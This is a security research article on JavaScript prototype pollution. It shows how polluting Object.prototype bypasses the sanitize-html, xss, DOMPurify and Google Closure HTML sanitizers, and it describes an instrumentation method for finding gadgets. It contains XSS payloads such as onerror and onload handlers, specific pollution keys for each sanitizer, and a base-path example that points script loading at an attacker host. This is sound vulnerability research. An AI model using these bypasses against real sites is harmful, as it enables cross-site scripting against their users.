Prototype pollution – and bypassing client-side HTML sanitizers

In this article I’ll cover the prototype pollution vulnerability and show how it can be used to bypass client-side HTML sanitizers. I’ll also look at ways to find prototype pollution gadgets semi-automatically. It could also be a big help in solving my XSS challenge.

Prototype pollution basics

Prototype pollution is a security vulnerability that is quite specific to JavaScript. It stems from JavaScript’s inheritance model, called prototype-based inheritance. Unlike in C++ or Java, in JavaScript you don’t need to define a class to create an object. You just need to use the curly bracket notation and define properties, for example:
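A minimal sketch of such an object literal; the values 111 and 222 are placeholders chosen for illustration:

```javascript
// Hypothetical object with two own properties; the values are placeholders.
const obj = {
  prop1: 111,
  prop2: 222,
};

// Object.keys lists only the object's own enumerable properties.
console.log(Object.keys(obj));
```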

This object has two properties: prop1 and prop2. But these are not the only properties we can access. For example a call to obj.toString() would return "[object Object]". toString (along with some other default members) comes from the prototype. Every object in JavaScript has a prototype (it can also be null). If we don’t specify it, by default the prototype for an object is Object.prototype.

In DevTools, we can easily check a list of properties of Object.prototype:
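The same list can be obtained programmatically. This is a small sketch; the exact set of names depends on the JavaScript engine:

```javascript
// Own property names of Object.prototype; the exact list varies between engines.
const protoProps = Object.getOwnPropertyNames(Object.prototype);
console.log(protoProps);
```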

We can also find out what object is a prototype of a given object, by checking its __proto__ member or by calling Object.getPrototypeOf:
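A short sketch of both ways of reading the prototype, using hypothetical objects named plain and bare:

```javascript
const plain = { prop1: 111 };

// Both checks report Object.prototype for an ordinary object literal.
console.log(plain.__proto__ === Object.prototype);
console.log(Object.getPrototypeOf(plain) === Object.prototype);

// An object created with Object.create(null) has no prototype at all.
const bare = Object.create(null);
console.log(Object.getPrototypeOf(bare));
```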

Similarly, we can set the prototype of the object using __proto__ or Object.setPrototypeOf:
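A sketch of both ways of setting the prototype; base, viaAccessor and viaFunction are names made up for this example:

```javascript
const base = {
  greet() {
    return 'hello';
  },
};

// Setting the prototype through the __proto__ accessor.
const viaAccessor = {};
viaAccessor.__proto__ = base;

// Setting the prototype through Object.setPrototypeOf (returns the object).
const viaFunction = Object.setPrototypeOf({}, base);

console.log(viaAccessor.greet(), viaFunction.greet());
```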

In a nutshell, when we try to access a property of an object, the JS engine first checks if the object itself contains the property. If it does, its value is returned. Otherwise, JS checks if the prototype has the property. If it doesn’t, JS checks the prototype of the prototype, and so on, until the prototype is null. This is called the prototype chain.
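The lookup can be approximated in plain JavaScript. The lookup function below is a hypothetical helper written for illustration (it ignores details such as getters and proxies), not how an engine is actually implemented:

```javascript
// Simplified model of property lookup along the prototype chain.
function lookup(obj, key) {
  let current = obj;
  while (current !== null) {
    // Stop at the first object in the chain that owns the property.
    if (Object.prototype.hasOwnProperty.call(current, key)) {
      return current[key];
    }
    current = Object.getPrototypeOf(current);
  }
  return undefined; // reached the end of the chain
}

const grandparent = { inherited: 'from grandparent' };
const parent = Object.create(grandparent);
const child = Object.create(parent);
child.own = 'from child';

console.log(lookup(child, 'own'));
console.log(lookup(child, 'inherited'));
console.log(lookup(child, 'missing'));
```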

The fact that JS traverses the prototype chain has an important effect: if we could somehow pollute Object.prototype (that is, extend it with new properties), then every JS object that inherits from it, which is almost all of them, would have these properties.

Consider the following example:
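A minimal sketch of such a check, with a hypothetical user object and message:

```javascript
// The user object has no admin property of its own.
const user = { userid: 123 };

if (user.admin) {
  console.log('You are an admin');
}
```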

At first sight, it may seem impossible to make the if-condition true, as the user object doesn’t have a property called admin. However, if we pollute Object.prototype and define a property called admin, then the console.log will execute!
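A sketch of the polluted case. The pollution is simulated with a direct assignment and removed again at the end; the user object and message are hypothetical:

```javascript
// Simulated pollution: every ordinary object now inherits admin === true.
Object.prototype.admin = true;

const user = { userid: 123 };
const grantedAdmin = Boolean(user.admin);

if (user.admin) {
  console.log('You are an admin');
}

// Clean up so the rest of the program is not affected.
delete Object.prototype.admin;
```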

This proves that prototype pollution may have a huge impact on the security of applications, as we can define properties that change their logic. There are only a few known cases of abusing the vulnerability though (please let me know if you know more!):

Before going to the main point of this article, I need to cover one more topic: how can prototype pollution occur in the first place?

The entry point of this vulnerability is usually a merge operation (that is, copying all properties from one object to another). For instance:
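A sketch of a shallow merge; merge is a hypothetical helper and the objects are placeholders:

```javascript
// Copies every own enumerable property of source onto target.
function merge(target, source) {
  for (const key of Object.keys(source)) {
    target[key] = source[key];
  }
  return target;
}

const obj1 = { a: 1, b: 2 };
const obj2 = { c: 3, d: 4 };
merge(obj1, obj2);
console.log(obj1);
```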

Sometimes the operation works recursively, for instance:

The basic flow of recursive merge is:

  1. Iterate over all properties of obj2 and check if they exist in obj1.
  2. If a property exists, then perform a merge operation on this property.
  3. If a property doesn’t exist, then copy it from obj2 to obj1.
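The steps above can be sketched as follows. recursiveMerge and isObject are hypothetical helpers; this sketch recurses only when both sides are objects, and it is deliberately naive (it makes no attempt to filter dangerous keys):

```javascript
function isObject(value) {
  return value !== null && typeof value === 'object';
}

// Naive recursive merge: intentionally has no protection against special keys.
function recursiveMerge(target, source) {
  for (const key in source) {
    if (isObject(target[key]) && isObject(source[key])) {
      // The property exists on both sides: merge it recursively.
      recursiveMerge(target[key], source[key]);
    } else {
      // Otherwise copy the value from source to target.
      target[key] = source[key];
    }
  }
  return target;
}

const obj1 = { a: { b: 1 }, e: 5 };
const obj2 = { a: { c: 2 }, d: 4 };
recursiveMerge(obj1, obj2);
console.log(obj1);
```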

In the real world, if the user has any control over the objects being merged, then usually one of the objects comes from the output of JSON.parse. And JSON.parse is a little bit special because it treats __proto__ as a “normal” property, i.e. without its special meaning of being a prototype accessor. Consider the following example:
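A sketch of the difference, using the value 123 in both cases:

```javascript
// In an object literal, __proto__ is the special prototype setter.
// A non-object value such as 123 is ignored, so the prototype stays unchanged.
const obj1 = { __proto__: 123 };

// JSON.parse creates an ordinary own property named "__proto__".
const obj2 = JSON.parse('{"__proto__": 123}');

console.log(obj1.__proto__ === Object.prototype);
console.log(obj2.__proto__);
console.log(Object.keys(obj1), Object.keys(obj2));
```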

In the example, obj1 is created using the curly bracket notation of JS, while obj2 is created with JSON.parse. Both are written with a single key, __proto__. However, accessing obj1.__proto__ returns Object.prototype (so __proto__ is the special property that returns the prototype), while obj2.__proto__ contains the value given in the JSON, namely 123. This shows that the __proto__ property is treated differently by JSON.parse than in ordinary JavaScript.

So now imagine a recursiveMerge function that merges two objects:

  • obj1={}
  • obj2=JSON.parse('{"__proto__":{"x":1}}')

The function would proceed more or less as follows:

  1. Iterate over all properties in obj2. The only property is __proto__.
  2. Check if obj1.__proto__ exists. It does.
  3. Iterate over all properties in obj2.__proto__. The only property is x.
  4. Assign: obj1.__proto__.x = obj2.__proto__.x. Because obj1.__proto__ points to Object.prototype, the prototype is polluted.
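The walk-through above can be reproduced with a naive merge. recursiveMerge here is a hypothetical, deliberately unsafe implementation; the polluted property is deleted again at the end:

```javascript
// Deliberately unsafe recursive merge, written for illustration only.
function recursiveMerge(target, source) {
  for (const key in source) {
    const bothObjects =
      target[key] !== null && typeof target[key] === 'object' &&
      source[key] !== null && typeof source[key] === 'object';
    if (bothObjects) {
      recursiveMerge(target[key], source[key]);
    } else {
      target[key] = source[key];
    }
  }
  return target;
}

const obj1 = {};
const obj2 = JSON.parse('{"__proto__":{"x":1}}');
recursiveMerge(obj1, obj2);

// An unrelated object now inherits x from the polluted Object.prototype.
const unrelated = {};
const pollutedValue = unrelated.x;
console.log(pollutedValue);

// Clean up the pollution.
delete Object.prototype.x;
```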

This type of bug has been identified in many popular JS libraries, including lodash and jQuery.

Prototype pollution and HTML sanitizers

Now we know what prototype pollution is and how a merge operation can introduce the vulnerability. As I mentioned earlier, all publicized examples of exploiting prototype pollution focused on NodeJS, where the goal was to achieve Remote Code Execution. However, client-side JavaScript can also be affected by the vulnerability. So the question I asked myself was: what can attackers gain from prototype pollution in the browser’s world?

I focused my attention on HTML sanitizers. HTML sanitizers are libraries whose job is to take untrusted HTML markup and delete all tags or attributes that could introduce an XSS attack. Usually they’re based on allow-lists; that is, they have a list of tags and attributes that are allowed, and everything else is deleted.

Imagine that we have a sanitizer that allows only <b> and <h1> tags. If we feed it the following markup:

It should clean it to the following form:
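To make the before and after concrete, here is a toy model with hypothetical input markup. toySanitize is a regex-based illustration only; it is not how real sanitizers work and must not be used for actual sanitization:

```javascript
// Toy allow-list; a real sanitizer parses HTML instead of using regexes.
const ALLOWED_TAGS = ['b', 'h1'];

function toySanitize(html) {
  return html
    // Drop script elements together with their content.
    .replace(/<script\b[^>]*>[\s\S]*?<\/script>/gi, '')
    // Keep allowed tags (without attributes), strip every other tag.
    .replace(/<(\/?)([a-z][a-z0-9]*)\b[^>]*>/gi, (match, slash, name) => {
      const tag = name.toLowerCase();
      return ALLOWED_TAGS.includes(tag) ? `<${slash}${tag}>` : '';
    });
}

const dirty = '<h1>Header</h1>This is <b>some</b> <i>HTML</i><script>alert(1)</script>';
const clean = toySanitize(dirty);
console.log(clean);
```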

HTML sanitizers need to maintain the list of allowed elements and attributes. Libraries usually employ one of two ways to store the list:

1. In an array

The library might have an array with a list of allowed elements, for instance:
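A sketch of such an array together with a membership check; the element names and the isElementAllowed helper are illustrative:

```javascript
// Hypothetical allow-list stored as an array.
const ALLOWED_ELEMENTS = ['h1', 'i', 'b', 'div'];

function isElementAllowed(element) {
  return ALLOWED_ELEMENTS.includes(element);
}

console.log(isElementAllowed('h1'), isElementAllowed('script'));
```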

Then, to check if some element is allowed, the library simply calls ALLOWED_ELEMENTS.includes(element). This approach is safe from prototype pollution because an array’s own properties shadow anything defined on the prototype; that is, we can’t pollute the length property, nor the indexes that already exist.

For instance, even if we do:

Then ALLOWED_ELEMENTS.length still returns 4 and ALLOWED_ELEMENTS[0] is still "h1".
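A sketch of this attempt, with a hypothetical four-element allow-list. The polluted properties are removed at the end:

```javascript
const ALLOWED_ELEMENTS = ['h1', 'i', 'b', 'div'];

// Attempted pollution of properties the array already owns.
Object.prototype.length = 10;
Object.prototype[0] = 'test';

// The array's own length and indexes shadow the polluted values.
const lengthAfter = ALLOWED_ELEMENTS.length;
const firstAfter = ALLOWED_ELEMENTS[0];
const scriptAllowed = ALLOWED_ELEMENTS.includes('script');
console.log(lengthAfter, firstAfter, scriptAllowed);

// Clean up.
delete Object.prototype.length;
delete Object.prototype[0];
```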

2. In an object

The other solution is to store an object with allowed elements, for instance:
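A sketch of an object-based allow-list with a plain property lookup; the element names and the isElementAllowed helper are illustrative:

```javascript
// Hypothetical allow-list stored as an object.
const ALLOWED_ELEMENTS = {
  h1: true,
  i: true,
  b: true,
  div: true,
};

// A plain lookup like this one also consults the prototype chain.
function isElementAllowed(element) {
  return Boolean(ALLOWED_ELEMENTS[element]);
}

console.log(isElementAllowed('h1'), isElementAllowed('script'));
```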

Then, to check if some element is allowed, the library may check for the existence of ALLOWED_ELEMENTS[element]. This approach is easily exploitable via prototype pollution, since if we pollute the prototype the following way:

Then ALLOWED_ELEMENTS["SCRIPT"] returns true.
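A sketch of the effect, with a hypothetical allow-list object. An own-property check is included for contrast, and the pollution is removed at the end:

```javascript
const ALLOWED_ELEMENTS = { h1: true, i: true, b: true, div: true };

const before = Boolean(ALLOWED_ELEMENTS['SCRIPT']);

// Simulated pollution.
Object.prototype.SCRIPT = true;

// The plain lookup falls through to Object.prototype.
const after = Boolean(ALLOWED_ELEMENTS['SCRIPT']);

// An own-property check is not fooled by the polluted prototype.
const ownCheck = Object.prototype.hasOwnProperty.call(ALLOWED_ELEMENTS, 'SCRIPT');
console.log(before, after, ownCheck);

// Clean up.
delete Object.prototype.SCRIPT;
```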

List of analyzed sanitizers

I searched for HTML sanitizers on npm and found the three most popular ones:

  • sanitize-html with around 800k downloads per week
  • xss with around 770k downloads per week
  • dompurify with around 544k downloads per week

I also included google-closure-library, which isn’t very popular in npm, but is extremely commonly used in Google applications. And Google is my favourite bug bounty program so it was worth looking into.

In the next chapters I’ll give a short overview of all the sanitizers, and show how all of them can be bypassed with prototype pollution. I’ll assume that the prototype is polluted before the library is even loaded. I will also assume that all sanitizers are used in the default configuration.

sanitize-html

The invocation of sanitize-html is simple:

Optionally, you can pass a second parameter to sanitizeHtml with options. If you don’t, the default options are used:

The allowedTags property is an array, which means we cannot target it with prototype pollution. It’s worth noticing, though, that iframe is allowed.

Moving forward, allowedAttributes is a map, which suggests that adding the property iframe: ['onload'] should make it possible to perform XSS via <iframe onload=alert(1)>.

Internally, allowedAttributes are rewritten to a variable allowedAttributesMap. And here’s the logic that decides whether an attribute should be allowed or not (name is the name of the current tag, and a is the name of the attribute):

We will focus on checks on allowedAttributesMap. In a nutshell, it is checked whether the attribute is allowed for current tag or for all tags (when the wildcard '*' is used). Quite interestingly, sanitize-html has some sort of protection against prototype pollution:

hasOwnProperty checks whether an object has a property, but it doesn’t traverse the prototype chain. This means that calls to the has function are not susceptible to prototype pollution. However, has is not used for the wildcard!

So if I pollute the prototype with:

Then onload will be a valid attribute for any tag, which is proven below:
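The logic described above can be modelled in a few lines. This is a simplified sketch and not the library’s actual source: isAttributeAllowed and the map contents are assumptions, and only the has helper and the unguarded wildcard lookup follow the description in the text:

```javascript
// Own-property check: does not traverse the prototype chain.
function has(obj, key) {
  return Object.prototype.hasOwnProperty.call(obj, key);
}

// Illustrative allow-list of attributes per tag (not the real defaults).
const allowedAttributesMap = { a: ['href', 'name', 'target'] };

function isAttributeAllowed(name, a) {
  // Per-tag check, guarded by has().
  const perTag = has(allowedAttributesMap, name) && allowedAttributesMap[name].includes(a);
  // Wildcard check, NOT guarded by has(): it can read from Object.prototype.
  const wildcard = allowedAttributesMap['*'] && allowedAttributesMap['*'].includes(a);
  return Boolean(perTag || wildcard);
}

const allowedBefore = isAttributeAllowed('iframe', 'onload');

// Simulated pollution of the wildcard key.
Object.prototype['*'] = ['onload'];
const allowedAfter = isAttributeAllowed('iframe', 'onload');
console.log(allowedBefore, allowedAfter);

// Clean up.
delete Object.prototype['*'];
```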

xss

Invocation of the next library, xss, looks quite similar:

It can also optionally accept a second parameter, called options. And the way it is processed is the most prototype-pollution-friendly pattern you could spot in JS code:

All these properties of the form options.propertyName can be polluted. The obvious candidate is whiteList, which has the following format:

So the idea is to define my own whitelist, accepting img tag with onerror and src attributes:
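A simplified model of this pattern. resolveOptions and DEFAULT_WHITELIST are hypothetical stand-ins rather than the library’s real code; only the option name whiteList and the tag-to-attributes format come from the text:

```javascript
// Illustrative default allow-list: tag name mapped to allowed attributes.
const DEFAULT_WHITELIST = {
  a: ['target', 'href', 'title'],
  b: [],
};

// Falls back to the default only when options.whiteList is falsy.
// The read of options.whiteList traverses the prototype chain.
function resolveOptions(options) {
  options = options || {};
  options.whiteList = options.whiteList || DEFAULT_WHITELIST;
  return options;
}

// Simulated pollution: define a custom whitelist on Object.prototype.
Object.prototype.whiteList = { img: ['onerror', 'src'] };
const effective = resolveOptions().whiteList;
console.log(effective);

// Clean up.
delete Object.prototype.whiteList;
```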

dompurify

Similarly to previous sanitizers, basic usage of DOMPurify is quite simple:

DOMPurify also accepts a second parameter with configuration. Here, too, there is a pattern that makes it vulnerable to prototype pollution:

In JavaScript, the in operator traverses the prototype chain. Hence 'ALLOWED_ATTR' in cfg returns true if this property exists in Object.prototype.

DOMPurify by default allows the <img> tag, so the exploit requires only polluting ALLOWED_ATTR with onerror and src.
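A simplified model of the pattern. parseConfig and DEFAULT_ALLOWED_ATTR are hypothetical and the default list is illustrative; only the 'ALLOWED_ATTR' in cfg check follows the text:

```javascript
// Illustrative defaults, not DOMPurify's real list.
const DEFAULT_ALLOWED_ATTR = ['alt', 'class', 'href', 'src', 'title'];

function parseConfig(cfg) {
  cfg = cfg || {};
  // The in operator walks the prototype chain, so an inherited
  // ALLOWED_ATTR is treated as if the caller had configured it.
  return 'ALLOWED_ATTR' in cfg
    ? new Set(cfg.ALLOWED_ATTR)
    : new Set(DEFAULT_ALLOWED_ATTR);
}

const attrsBefore = parseConfig();

// Simulated pollution.
Object.prototype.ALLOWED_ATTR = ['onerror', 'src'];
const attrsAfter = parseConfig();
console.log([...attrsBefore], [...attrsAfter]);

// Clean up.
delete Object.prototype.ALLOWED_ATTR;
```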

Interestingly, Cure53 released a new version of DOMPurify that attempts to protect against this very attack. If you think you can bypass the fix, have a look at an updated version of my challenge.

Closure

Closure Sanitizer has a file called attributewhitelist.js which has the following format:

In this file a list of allowed attributes is defined. It follows the format "TAG_NAME ATTRIBUTE_NAME", where TAG_NAME could also be a wildcard ("*"). So a bypass is as simple as polluting the prototype to allow onerror and src on all elements.

The code below proves the bypass:
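A simplified model of such a lookup. attributeWhitelist and isAttributeAllowed are hypothetical names and the entries are illustrative; only the "TAG_NAME ATTRIBUTE_NAME" key format and the wildcard come from the text:

```javascript
// Illustrative entries in the "TAG_NAME ATTRIBUTE_NAME" format.
const attributeWhitelist = {
  '* ARIA-CHECKED': true,
  '* CLASS': true,
  'IMG ALT': true,
};

// Plain property lookups: both read through the prototype chain.
function isAttributeAllowed(tagName, attrName) {
  const tag = tagName.toUpperCase();
  const attr = attrName.toUpperCase();
  return Boolean(attributeWhitelist[`${tag} ${attr}`] || attributeWhitelist[`* ${attr}`]);
}

const onerrorBefore = isAttributeAllowed('img', 'onerror');

// Simulated pollution: allow onerror and src on all elements.
Object.prototype['* ONERROR'] = 1;
Object.prototype['* SRC'] = 1;
const onerrorAfter = isAttributeAllowed('img', 'onerror');
const srcAfter = isAttributeAllowed('img', 'src');
console.log(onerrorBefore, onerrorAfter, srcAfter);

// Clean up.
delete Object.prototype['* ONERROR'];
delete Object.prototype['* SRC'];
```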

Identifying prototype pollution gadgets

I’ve shown above that prototype pollution can be a way to bypass all popular JS sanitizers. To find the bypasses, I needed to analyze the sources manually. Even though all bypasses are quite similar, it still required some effort to perform the analysis. So a natural next step is to think about a way to make the process more automatic.

My first idea was to use a regular expression to scan for all possible identifiers in the source code of a library, and then add these properties to Object.prototype. If any of them is accessed, then I know that it could be manipulated via prototype pollution.

Here’s an example. We have the following snippet taken from DOMPurify:

We can extract the following possible identifiers from the snippet (assuming that identifier is \w+):

Now I’m defining all these properties in Object.prototype, for instance:
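A sketch of the whole idea. The source string is a hypothetical stand-in modelled on the 'ALLOWED_ATTR' in cfg pattern, and the accessed array replaces console logging so the result is easy to inspect; the getters are removed again at the end:

```javascript
// Hypothetical stand-in for a line of library source code.
const source = "ALLOWED_ATTR = 'ALLOWED_ATTR' in cfg ? addToSet({}, cfg.ALLOWED_ATTR) : DEFAULT_ALLOWED_ATTR;";

// Every \w+ token is treated as a possible property name.
const identifiers = [...new Set(source.match(/\w+/g))];

const accessed = [];
const installed = [];
for (const name of identifiers) {
  if (name in Object.prototype) continue; // never shadow existing members
  Object.defineProperty(Object.prototype, name, {
    configurable: true,
    get() {
      accessed.push(name); // record reads that reach Object.prototype
      return undefined;
    },
    set(value) {
      // Keep ordinary assignments working by creating an own property.
      Object.defineProperty(this, name, {
        value, writable: true, enumerable: true, configurable: true,
      });
    },
  });
  installed.push(name);
}

const cfg = {};
void cfg.ALLOWED_ATTR; // this read reaches the getter
const inOperatorAffected = 'ALLOWED_ATTR' in cfg; // side effect of the method

// Clean up all installed getters.
for (const name of installed) delete Object.prototype[name];
console.log(identifiers, accessed, inOperatorAffected);
```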

This method works but has some serious drawbacks:

  • It won’t work for computed property names (so I wouldn’t find anything for Closure for instance),
  • It breaks existence checks: 'ALLOWED_ATTR' in obj would return true, which is undesirable.

So I came up with a second idea. By definition, I have access to the source code of the library I’m trying to attack with prototype pollution, so I can use code instrumentation to replace all property accesses with calls to my own function, which checks whether the lookup would reach the prototype.

Example: I have the following line taken from DOMPurify:

It would get transformed to:

Where $_GET_PROP is defined as:

Basically, all property accesses are converted to calls to $_GET_PROP, which prints a message in the console when a property would be read from Object.prototype.
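A minimal sketch of what such a function could look like. Only the name $_GET_PROP comes from the text; the body, the prototypeReads array and the cfg object are assumptions made for illustration:

```javascript
const prototypeReads = [];

// Stand-in for an instrumented property access.
//   Original:      cfg.ALLOWED_ATTR
//   Instrumented:  $_GET_PROP(cfg, 'ALLOWED_ATTR')
function $_GET_PROP(obj, prop) {
  const inheritsFromObject =
    obj !== null && typeof obj === 'object' && obj instanceof Object;
  // If the property is found nowhere in the chain, the lookup ends at
  // Object.prototype, so a polluted value would be picked up here.
  if (inheritsFromObject && !(prop in obj)) {
    prototypeReads.push(prop);
    console.log(`obj[${JSON.stringify(prop)}] would be read from Object.prototype`);
  }
  return obj[prop];
}

const cfg = { FORBID_TAGS: ['style'] };
$_GET_PROP(cfg, 'FORBID_TAGS');  // own property: nothing is logged
$_GET_PROP(cfg, 'ALLOWED_ATTR'); // missing: logged as a candidate gadget
```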

I created a tool to do the instrumentation that I’m also sharing on GitHub. Here’s what it looks like:

Thanks to this method I could spot two more instances of abusing prototype pollution to bypass sanitizers. Let’s see what was logged when I ran DOMPurify:

That’s something I missed in the first place. Let’s take a look at the line where documentMode is being accessed:

So DOMPurify checks whether the current browser is modern enough to even work with it. If isSupported is equal to false, then DOMPurify performs no sanitization whatsoever. This means that we can pollute the prototype and set Object.prototype.documentMode = 9 to make this happen. The snippet below proves it:
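A simplified model of this behaviour. createPurifier, fakeDocument and the regex-based cleaning are hypothetical stand-ins (the real support check may involve more conditions); only documentMode, isSupported and the value 9 come from the text:

```javascript
// Toy purifier: the support check is evaluated once, at creation time.
function createPurifier(doc) {
  // Assumed shape of the check: documentMode 9 marks an unsupported browser.
  const isSupported = doc.documentMode !== 9;
  return {
    isSupported,
    sanitize(dirty) {
      if (!isSupported) return dirty; // no sanitization at all
      // Toy cleaning step: strip inline event handler attributes.
      return dirty.replace(/\son\w+\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)/gi, '');
    },
  };
}

const fakeDocument = {}; // plain object standing in for the browser document
const payload = '<img src=x onerror=alert(1)>';

const purifierBefore = createPurifier(fakeDocument);

// Simulated pollution before the "library" is initialised.
Object.prototype.documentMode = 9;
const purifierAfter = createPurifier(fakeDocument);
delete Object.prototype.documentMode; // clean up

const cleaned = purifierBefore.sanitize(payload);
const untouched = purifierAfter.sanitize(payload);
console.log(cleaned, untouched);
```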

The downside is that the prototype needs to be polluted before DOMPurify is even loaded.

Let’s now have a look at Closure. First of all, it is now very easy to see that Closure attempts to check whether attributes are in an allow-list:

Second of all, I noticed an interesting-looking property:

Closure loads lots of JS files with dependencies. CLOSURE_BASE_PATH defines the path. So we can pollute the property to load our own JS from any path. The sanitizer doesn’t even need to be called!

Here’s a proof:
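A simplified model of why this works. resolveDependencyUrl, fakeWindow, the default path and the attacker URL are all hypothetical; only the property name CLOSURE_BASE_PATH comes from the text, and no script is actually loaded here:

```javascript
// Toy loader: builds the URL a dependency would be loaded from.
function resolveDependencyUrl(globalObject, relativePath) {
  // A plain property read: falls through to Object.prototype if unset.
  const basePath = typeof globalObject.CLOSURE_BASE_PATH === 'string'
    ? globalObject.CLOSURE_BASE_PATH
    : '/closure/goog/'; // hypothetical default location
  return basePath + relativePath;
}

const fakeWindow = {}; // plain object standing in for the global object

const urlBefore = resolveDependencyUrl(fakeWindow, 'deps.js');

// Simulated pollution with an attacker-controlled base path.
Object.prototype.CLOSURE_BASE_PATH = 'https://attacker.example/';
const urlAfter = resolveDependencyUrl(fakeWindow, 'deps.js');
console.log(urlBefore, urlAfter);

// Clean up.
delete Object.prototype.CLOSURE_BASE_PATH;
```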

I believe that thanks to pollute.js, even more exploitation scenarios could be found.

Summary

The conclusion is that prototype pollution can lead to a bypass of all popular HTML sanitizers. This can usually be done by affecting the allow-list of elements or attributes.

As a final note, if you ever find a prototype pollution in Google Search, then you have XSS in the search field!